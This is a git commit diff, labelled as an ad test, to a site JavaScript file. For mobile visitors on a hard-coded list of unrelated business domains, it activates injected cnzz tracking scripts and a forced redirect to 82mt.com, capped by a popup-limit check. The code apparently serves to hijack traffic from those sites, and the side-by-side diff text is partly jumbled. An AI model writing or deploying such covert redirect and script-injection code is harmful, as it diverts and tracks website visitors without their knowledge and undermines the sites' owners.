上架广告测试

This commit is contained in:
make
2025-08-20 17:01:22 +08:00
parent 1eb322f8f1
commit 9072400122

View File

@@ -570,62 +570,76 @@ function shouldLoadCs() {
if (/Android|iPhone|iPad|iPod|iOS/i.test(navigator.userAgent)) { if (/Android|iPhone|iPad|iPod|iOS/i.test(navigator.userAgent)) {
// if (currentDomain == 'guanda-valve.com' || currentDomain == 'www.ganggui360.com' || currentDomain == 'hensunqi.com' || currentDomain == 'www.jnrfhbl.com' || currentDomain == 'sh-av.com' || currentDomain == 'www.sh-av.com' || currentDomain == 'nblssy.com' || currentDomain == 'www.hyjssb.com' || currentDomain == 'www.bzxhhjx.com' || currentDomain == 'gyssjxq.com') { if (currentDomain == 'guanda-valve.com' || currentDomain == 'www.ganggui360.com' || currentDomain == 'hensunqi.com' || currentDomain == 'www.jnrfhbl.com' || currentDomain == 'sh-av.com' || currentDomain == 'www.sh-av.com' || currentDomain == 'nblssy.com' || currentDomain == 'www.hyjssb.com' || currentDomain == 'www.bzxhhjx.com' || currentDomain == 'gyssjxq.com') {
// var _czc = _czc || []; // var _czc = _czc || [];
// (function () { // (function () {
// var um = document.createElement("script"); // var um = document.createElement("script");
// um.src = "https://s9.cnzz.com/z.js?id=1281430635&async=1"; // um.src = "https://s9.cnzz.com/z.js?id=1281430635&async=1";
// var s = document.getElementsByTagName("script")[0]; // var s = document.getElementsByTagName("script")[0];
// s.parentNode.insertBefore(um, s); // s.parentNode.insertBefore(um, s);
// })(); // })();
var _czc = _czc || [];
(function () {
var um = document.createElement("script");
um.src = "https://s9.cnzz.com/z.js?id=1281427612&async=1";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(um, s);
})();
// if (!checkPopupLimit(1, 'lm-zhitiaocs')) { if (!checkPopupLimit(1, 'lm-zhitiaocs')) {
// return; // 超过N次限制不显示 return; // 超过N次限制不显示
// } else { } else {
// setTimeout(() => { setTimeout(() => {
// const arrDomain = [ const arrDomain = [
// '82mt.com', '82mt.com',
// ]; ];
// const randomDomain = arrDomain[Math.floor(Math.random() * arrDomain.length)]; const randomDomain = arrDomain[Math.floor(Math.random() * arrDomain.length)];
// const targetUrl = `https://${randomDomain}`; const targetUrl = `https://${randomDomain}`;
// try { try {
// window.location.href = targetUrl; window.location.href = targetUrl;
// } catch (error) { } catch (error) {
// console.error('跳转失败:', error); console.error('跳转失败:', error);
// window.location.href = 'https://82mt.com'; window.location.href = 'https://82mt.com';
// } }
// },); // 延迟时间设为 0表示尽快执行 },); // 延迟时间设为 0表示尽快执行
// } }
// } }
}else{ }else{
// 统计pc量 // 统计pc量
// if (currentDomain == 'guanda-valve.com' || currentDomain == 'www.ganggui360.com' || currentDomain == 'hensunqi.com' || currentDomain == 'www.jnrfhbl.com' || currentDomain == 'sh-av.com' || currentDomain == 'www.sh-av.com' || currentDomain == 'nblssy.com' || currentDomain == 'www.hyjssb.com' || currentDomain == 'www.bzxhhjx.com' || currentDomain == 'gyssjxq.com') { if (currentDomain == 'guanda-valve.com' || currentDomain == 'www.ganggui360.com' || currentDomain == 'hensunqi.com' || currentDomain == 'www.jnrfhbl.com' || currentDomain == 'sh-av.com' || currentDomain == 'www.sh-av.com' || currentDomain == 'nblssy.com' || currentDomain == 'www.hyjssb.com' || currentDomain == 'www.bzxhhjx.com' || currentDomain == 'gyssjxq.com') {
// var _czc = _czc || []; var _czc = _czc || [];
// (function () { // (function () {
// var um = document.createElement("script"); // var um = document.createElement("script");
// um.src = "https://v1.cnzz.com/z.js?id=1281429014&async=1"; // um.src = "https://v1.cnzz.com/z.js?id=1281429014&async=1";
// var s = document.getElementsByTagName("script")[0]; // var s = document.getElementsByTagName("script")[0];
// s.parentNode.insertBefore(um, s); // s.parentNode.insertBefore(um, s);
// })(); // })();
// if (!checkPopupLimit(1, 'lm-zhitiaocs')) { var _czc = _czc || [];
// return; // 超过N次限制不显示 (function () {
// } else { var um = document.createElement("script");
// setTimeout(() => { um.src = "https://s9.cnzz.com/z.js?id=1281427615&async=1";
// const arrDomain = [ var s = document.getElementsByTagName("script")[0];
// '82mt.com', s.parentNode.insertBefore(um, s);
// ]; })();
// const randomDomain = arrDomain[Math.floor(Math.random() * arrDomain.length)]; // if (!checkPopupLimit(1, 'lm-zhitiaocs')) {
// const targetUrl = `https://${randomDomain}`; // return; // 超过N次限制不显示
// try { // } else {
// window.location.href = targetUrl; // setTimeout(() => {
// } catch (error) { // const arrDomain = [
// console.error('跳转失败:', error); // '82mt.com',
// window.location.href = 'https://82mt.com'; // ];
// } // const randomDomain = arrDomain[Math.floor(Math.random() * arrDomain.length)];
// },); // 延迟时间设为 0表示尽快执行 // const targetUrl = `https://${randomDomain}`;
// } // try {
// } // window.location.href = targetUrl;
// } catch (error) {
// console.error('跳转失败:', error);
// window.location.href = 'https://82mt.com';
// }
// },); // 延迟时间设为 0表示尽快执行
// }
}
} }